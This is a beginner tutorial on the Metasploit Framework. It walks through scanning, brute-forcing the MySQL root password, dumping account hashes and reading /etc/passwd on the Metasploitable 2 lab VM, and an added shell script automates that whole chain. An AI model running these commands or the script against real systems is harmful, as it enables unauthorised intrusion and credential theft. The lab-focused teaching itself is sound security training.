
Beginner’s Guide to Metasploit in Kali Linux (with Practical Examples)

Kali Linux comes with a large set of penetration-testing tools already installed. One of them is the Metasploit Framework, which lets red teams perform reconnaissance, vulnerability analysis, enumeration and exploitation against applications, networks, servers and operating systems.

Although the core of Metasploit is built around exploitation and post-exploitation tasks, it is also used to develop exploits and to verify whether a suspected vulnerability is actually present.

This article introduces the main components of the Metasploit Framework and shows how to use its modules to scan, enumerate and exploit a vulnerable MySQL database running on the deliberately insecure Metasploitable 2 virtual machine.


Metasploit is the most commonly used pentesting tool that comes pre-installed in Kali Linux. The main components of Metasploit are msfconsole and the modules it offers.

What is msfconsole?

msfconsole is the all-in-one, shell-like interface that gives you access to every feature of Metasploit. It behaves much like a Linux command line: it offers tab completion, command history and the other shortcuts you know from bash.

This is the main interface that will allow you to work with Metasploit modules to analyze and launch an attack on the target machine.

Metasploit Modules

Metasploit's functionality is delivered as modules, small self-contained pieces of code that each do one job. Before looking at the module types, you should be clear about the following recurring concepts:

  • Vulnerability: A flaw in the target's design, configuration or code that can be abused, for example to disclose confidential information or to run code on the system.
  • Exploit: Code that takes advantage of a specific vulnerability.
  • Payload: Code that runs on the target once the exploit has succeeded and achieves the attacker's goal, such as returning a reverse shell or a Meterpreter session to maintain access and read target data.

Now let's move on to the five module types you will use most often:

  • Auxiliary: Modules such as fuzzers, scanners and SQL injection tools that gather information and deepen your understanding of the target without delivering a payload.
  • Encoders: Modules that re-encode a payload so that it contains no "bad characters" (for example null bytes) that would break the exploit in transit. Encoding also changes the payload's bytes, which can defeat simple signature matching, but modern antivirus products are not reliably evaded this way.
  • Exploits: As stated earlier, an exploit is code that abuses a targeted vulnerability to gain access to the system and deliver a payload.
  • Payloads: As mentioned earlier, payloads achieve your goal on the compromised system: an interactive shell, a persistent backdoor, a single command, loading further tooling, and so on. Metasploit offers two kinds of payloads: single (inline) payloads, which are self-contained, and staged payloads, where a small stager first connects back and then downloads the rest of the payload.
  • Post: Post-exploitation modules gather further information from a compromised system. For example, they can dump password hashes and harvest user credentials for lateral movement or privilege escalation.


You can use the following commands to list each module type and its categories (replace <module-type> with a directory name from the listing, for example exploits):

cd /usr/share/metasploit-framework/modules
ls
tree -L 1 <module-type>/

Load msfconsole Modules

To start using the Metasploit interface, open a Kali Linux terminal and type msfconsole.

By default, msfconsole prints a banner on startup; to skip the banner and start the interface quietly, pass the -q flag:

msfconsole -q

The interface looks like a Linux command line shell. Some supported Linux Bash commands are ls, clear, grep, history, jobs, kill, cd, exit, etc.

Type help or a question mark (?) to see the list of all available commands in msfconsole. The most important ones used in this article are:

Command   Description
search    Searches the module database by keyword, protocol, application or other parameters
use       Selects a module and switches the context to that module's commands
info      Shows details about the selected module
show      Lists items such as modules, options, payloads or targets (for example, show options)
check     Tests whether the target is vulnerable without exploiting it, where the module supports it
set       Sets an option for the current module (context-specific)
unset     Clears a previously set option
run       Executes the current module

Before you begin, configure the Metasploit database by starting the PostgreSQL server and initializing the database as follows:

sudo systemctl start postgresql
sudo msfdb init

Now check that the database is connected by starting msfconsole and running the db_status command.

For the demonstration, set up the open-source vulnerable Linux machine Metasploitable 2 on the same network as your Kali machine.

MySQL discovery with msfconsole

First find the IP address of the Metasploitable machine. Then use the db_nmap command inside msfconsole, which accepts the usual Nmap flags and stores the results in the Metasploit database, to scan the MySQL service on port 3306 (replace <target-ip> with the Metasploitable address):

db_nmap -sV -sC -p 3306 <target-ip>

You can run a regular full port scan (nmap -p- <target-ip>) to confirm that MySQL is indeed listening on 3306 and has not been moved to another port.



Use the search command to find an auxiliary module that can analyze and enumerate the MySQL database:

search type:auxiliary mysql


From the resulting list, select the auxiliary/scanner/mysql/mysql_version module to identify the MySQL version, either by its full name or by the index number shown next to it in your search output (11 in this example; the number depends on your installed modules, so check your own listing):

use 11

Or:

use auxiliary/scanner/mysql/mysql_version

Now use the show options command to display the parameters needed to run the current module:


msfconcole auxiliary scan

The output shows that the only option required and not set is RHOSTS which is the IP address of the target machine. Use the set rhosts to set the parameter and run the module, as follows:


MYSQL version of msfconsole

The output shows similar MySQL version details as db_nmap a function.

Bruteforce MySQL root account with msfconsole

After the scan, you can brute-force the MySQL root account with the auxiliary/scanner/mysql/mysql_login module:

use auxiliary/scanner/mysql/mysql_login
set USERNAME root

Set the PASS_FILE option to a wordlist; Kali ships several under /usr/share/wordlists. Note that on a fresh Kali install rockyou.txt is compressed as rockyou.txt.gz, so extract it first (sudo gunzip /usr/share/wordlists/rockyou.txt.gz):

set PASS_FILE /usr/share/wordlists/rockyou.txt

Next, specify the IP address of the target machine with the RHOSTS option:

set RHOSTS <target-ip>

Set BLANK_PASSWORDS to true so the module also tries an empty password, in case the root account has none:

set BLANK_PASSWORDS true

Finally, run the module by typing run at the msfconsole prompt. On Metasploitable 2 the root account is found to have an empty password.


MySQL enumeration with msfconsole

msfconsole also lets you enumerate the database with the auxiliary/admin/mysql/mysql_enum module. It returns all accounts along with their privileges and password hashes, and reports server settings relevant to an attacker.

To do this, you need to set the USERNAME, PASSWORD and RHOSTS options, using the credentials recovered in the previous step:

use auxiliary/admin/mysql/mysql_enum
set USERNAME root
set PASSWORD ""
set RHOSTS <target-ip>


Finally, launch the module by typing:

run


Exploiting MySQL with msfconsole

The enumeration step shows that the root account holds the FILE privilege, which allows it to call the LOAD_FILE() function and read files from the database server's own filesystem. Any file readable by the MySQL daemon's OS user can be retrieved this way; on Metasploitable 2's old MySQL 5.0 there is no secure_file_priv restriction, whereas current MySQL releases limit LOAD_FILE() to a configured directory or disable it. Here it is used to read /etc/passwd through the auxiliary/admin/mysql/mysql_sql module:

Again, set the USERNAME, PASSWORD and RHOSTS options. Then set the SQL option to a query that invokes LOAD_FILE() on /etc/passwd. msfconsole splits each command line with shell-style quoting, so the quotes around the file name must be escaped or they will be stripped before the query reaches MySQL:

use auxiliary/admin/mysql/mysql_sql
set USERNAME root
set PASSWORD ""
set RHOSTS <target-ip>
set SQL select load_file(\"/etc/passwd\")
run

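The five steps above (db_nmap, mysql_version, mysql_login, mysql_enum and mysql_sql) can be collected in a msfconsole resource script and replayed with msfconsole -r, which is how you would repeat the check against a lab target without retyping every option. The following shell script is added here as an example; it is not from the article or from the Metasploit project. It assumes msfconsole is on PATH, the database has been initialised with msfdb init, the target is your own Metasploitable 2 VM, and, as the brute-force step showed, the root password is empty. The IP addresses and the /tmp/words.txt path used when exercising it are constructed values.

```sh
#!/bin/sh
# Added example (not from the article or the Metasploit project): drive the
# whole MySQL workflow from a msfconsole resource script so it can be re-run
# against a lab target. Assumes msfconsole on PATH, msfdb init already done,
# and a Metasploitable 2 target whose MySQL root account has an empty password.

# Print a resource script for TARGET using WORDLIST (default: rockyou.txt).
# Module and option names are Metasploit's own; the target/wordlist values
# are whatever the caller supplies.
build_rc() {
  target=$1
  wordlist=${2:-/usr/share/wordlists/rockyou.txt}
  # Unquoted heredoc so ${target} expands. The \" sequence is kept by the
  # shell and reaches msfconsole as an escaped quote, which it needs because
  # it splits each line with shell-style quoting and would otherwise strip
  # the quotes around the file name.
  cat <<EOF
# RHOSTS is set globally so every module below inherits it
setg RHOSTS ${target}

# 1. Service discovery stored in the msf database (db_status must be connected)
db_nmap -sV -sC -p 3306 ${target}

# 2. Version fingerprint
use auxiliary/scanner/mysql/mysql_version
run

# 3. Brute-force root; try the empty password too, stop at the first hit
use auxiliary/scanner/mysql/mysql_login
set USERNAME root
set BLANK_PASSWORDS true
set PASS_FILE ${wordlist}
set STOP_ON_SUCCESS true
run

# 4. Enumerate accounts, privileges and password hashes
use auxiliary/admin/mysql/mysql_enum
set USERNAME root
set PASSWORD ""
run

# 5. Abuse the FILE privilege to read a file off the database host
use auxiliary/admin/mysql/mysql_sql
set USERNAME root
set PASSWORD ""
set SQL select load_file(\"/etc/passwd\")
run

exit
EOF
}

# Accept only a dotted-quad IPv4 address so a typo cannot point the scan
# at an unintended host.
valid_ipv4() {
  case $1 in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  saved_ifs=$IFS
  IFS=.
  set -- $1
  IFS=$saved_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    [ "$octet" -le 255 ] || return 1
  done
}

main() {
  target=${1:?usage: $0 <metasploitable-ip> [wordlist]}
  valid_ipv4 "$target" || { echo "not an IPv4 address: $target" >&2; exit 2; }
  wordlist=${2:-/usr/share/wordlists/rockyou.txt}
  # Kali ships rockyou compressed; say so instead of letting mysql_login fail
  if [ ! -f "$wordlist" ] && [ -f "$wordlist.gz" ]; then
    echo "wordlist is compressed: run gunzip $wordlist.gz first" >&2; exit 2
  fi
  rc=$(mktemp) || exit 1
  build_rc "$target" "$wordlist" >"$rc"
  msfconsole -q -r "$rc"   # -q: no banner, -r: run the resource script
  rm -f "$rc"
}

# Run only when invoked with arguments, so the file can also be sourced
if [ $# -gt 0 ]; then main "$@"; fi
```

Run it as sh mysql-lab.sh <target-ip> [wordlist]. Lines beginning with # in the generated file are treated as comments by msfconsole's resource loader, so the numbered steps remain visible when you inspect the script before running it.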

Metasploit modules support every phase of a penetration test, and the framework also lets you write your own modules.

This article has summarized the core module types of the Metasploit Framework and shown how to scan, enumerate and exploit a MySQL database on the Metasploitable 2 machine.

Metasploit isn’t the only penetration testing tool you’ll use as a cybersecurity professional. There are several other utilities you will need to become familiar with if you want to become a security expert.
